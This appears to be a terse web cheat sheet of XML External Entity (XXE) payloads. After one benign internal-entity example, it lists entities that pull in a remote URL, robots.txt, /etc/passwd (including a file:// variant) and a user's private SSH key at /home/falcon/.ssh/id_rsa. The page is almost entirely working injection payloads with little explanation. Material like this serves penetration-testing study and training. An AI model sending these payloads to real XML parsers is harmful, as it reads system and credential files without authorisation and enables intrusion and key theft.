Skip to content

XML External Entity (XEE)

XML External Entity -> XEE -> XXE

<?xml version="1.0"?>
<!DOCTYPE change-log[
        <!ENTITY myName "Michal">
        <!ENTITY mySurname "Szalkowski">
        ]>
<change-log>
    <text>&myName; &mySurname;</text>
</change-log>

webContent 

<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY webContent SYSTEM "http://log.michalszalkowski.com/lorem.txt">]>
<root>
    <text>&webContent;</text>;
</root>


<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "robots.txt">]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>

fileContent

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/etc/passwd">]>
<root>&fileContent;</root>

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/home/falcon/.ssh/id_rsa">]>
<root>&fileContent;</root>

<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM 'file:///etc/passwd'>]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>